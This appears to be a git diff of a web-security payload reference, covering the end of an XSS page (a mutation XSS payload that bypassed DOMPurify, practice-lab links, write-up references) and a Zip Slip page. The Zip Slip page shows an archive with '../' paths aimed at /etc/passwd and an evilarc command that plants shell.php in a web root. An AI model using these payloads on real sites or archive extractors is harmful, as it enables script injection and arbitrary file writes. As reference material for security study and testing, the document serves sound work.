```ps1
$ ruby -run -ehttpd . -p8080
ruby -run -ehttpd . -p8080
```
## Mutated XSS
Use browsers quirks to recreate some HTML tags.
**Example**: Mutated XSS from Masato Kinugawa, used against [cure53/DOMPurify](https://github.com/cure53/DOMPurify) component on Google Search.
**Example**: Mutated XSS from Masato Kinugawa, used against [cure53/DOMPurify](https://github.com/cure53/DOMPurify) component on Google Search.
```javascript
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
```
Technical blogposts available at
* https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/
* https://research.securitum.com/dompurify-bypass-using-mxss/
## Labs
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
* [Root Me - XSS - Reflected](https://www.root-me.org/en/Challenges/Web-Client/XSS-Reflected)
* [Root Me - XSS - Server Side](https://www.root-me.org/en/Challenges/Web-Server/XSS-Server-Side)
* [Root Me - XSS - Stored 1](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1)
* [Root Me - XSS - Stored 2](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2)
* [Root Me - XSS - Stored - Filter Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass)
* [Root Me - XSS DOM Based - Introduction](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Introduction)
* [Root Me - XSS DOM Based - AngularJS](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-AngularJS)
* [Root Me - XSS DOM Based - Eval](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Eval)
* [Root Me - XSS DOM Based - Filters Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Filters-Bypass)
* [Root Me - XSS - DOM Based](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based)
* [Root Me - Self XSS - DOM Secrets](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-DOM-Secrets)
* [Root Me - Self XSS - Race Condition](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-Race-Condition)
- [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
- [Root Me - XSS - Reflected](https://www.root-me.org/en/Challenges/Web-Client/XSS-Reflected)
- [Root Me - XSS - Server Side](https://www.root-me.org/en/Challenges/Web-Server/XSS-Server-Side)
- [Root Me - XSS - Stored 1](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1)
- [Root Me - XSS - Stored 2](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2)
- [Root Me - XSS - Stored - Filter Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass)
- [Root Me - XSS DOM Based - Introduction](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Introduction)
- [Root Me - XSS DOM Based - AngularJS](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-AngularJS)
- [Root Me - XSS DOM Based - Eval](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Eval)
- [Root Me - XSS DOM Based - Filters Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Filters-Bypass)
- [Root Me - XSS - DOM Based](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based)
- [Root Me - Self XSS - DOM Secrets](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-DOM-Secrets)
- [Root Me - Self XSS - Race Condition](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-Race-Condition)
## References
@ -591,6 +579,7 @@ Technical blogposts available at
- [Google XSS Turkey - Frans Rosén - June 6, 2015](https://labs.detectify.com/2015/06/06/google-xss-turkey/)
- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g)
- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
- [Mutation XSS in Google Search - Tomasz Andrzej Nidecki - April 10, 2019](https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/)
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013](https://cure53.de/fp170.pdf)
- [postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
- [RPO that lead to information leakage in Google - @filedescriptor - July 3, 2016](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/)
@ -609,6 +598,7 @@ Technical blogposts available at
- [Unleashing an Ultimate XSS Polyglot - Ahmed Elsobky - February 16, 2018](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
- [Using a Braun Shaver to Bypass XSS Audit and WAF - Frans Rosen - April 19, 2016](http://web.archive.org/web/20160810033728/https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify)
- [Ways to alert(document.domain) - Tom Hudson (@tomnomnom) - February 22, 2018](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)
- [Write-up of DOMPurify 2.0.0 bypass using mutation XSS - Michał Bentkowski - September 20, 2019](https://research.securitum.com/dompurify-bypass-using-mxss/)
- [XSS by Tossing Cookies - WeSecureApp - July 10, 2017](https://wesecureapp.com/blog/xss-by-tossing-cookies/)
- [XSS ghettoBypass - d3adend - September 25, 2015](http://d3adend.org/xss/ghettoBypass)
- [XSS in Uber via Cookie - zhchbin - August 30, 2017](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/)
@ -616,4 +606,4 @@ Technical blogposts available at
- [XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
- [Xssing Web With Unicodes - Rakesh Mane - August 3, 2017](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
- [Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016](https://klikki.fi/adv/yahoo.html)
- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)
- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)

8
Zip Slip/README.md
View file

@ -6,23 +6,20 @@
* [Tools](#tools)
* [Methodology](#methodology)
* [Additional Notes](#additional-notes)
* [References](#references)
## Tools
* [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) - Create tar/zip archives that can exploit directory traversal vulnerabilities
* [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives
## Methodology
The Zip Slip vulnerability is a critical security flaw that affects the handling of archive files, such as ZIP, TAR, or other compressed file formats. This vulnerability allows an attacker to write arbitrary files outside of the intended extraction directory, potentially overwriting critical system files, executing malicious code, or gaining unauthorized access to sensitive information.
**Example**: Suppose an attacker creates a ZIP file with the following structure:
```
```ps1
malicious.zip
├── ../../../../etc/passwd
├── ../../../../usr/local/bin/malicious_script.sh
@ -30,8 +27,8 @@ malicious.zip
When a vulnerable application extracts `malicious.zip`, the files are written to `/etc/passwd` and /`usr/local/bin/malicious_script.sh` instead of being contained within the extraction directory. This can have severe consequences, such as corrupting system files or executing malicious scripts.
* Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
```python
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
```
@ -45,7 +42,6 @@ When a vulnerable application extracts `malicious.zip`, the files are written to
For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)
## References
* [Zip Slip - Snyk - June 5, 2018](https://github.com/snyk/zip-slip-vulnerability)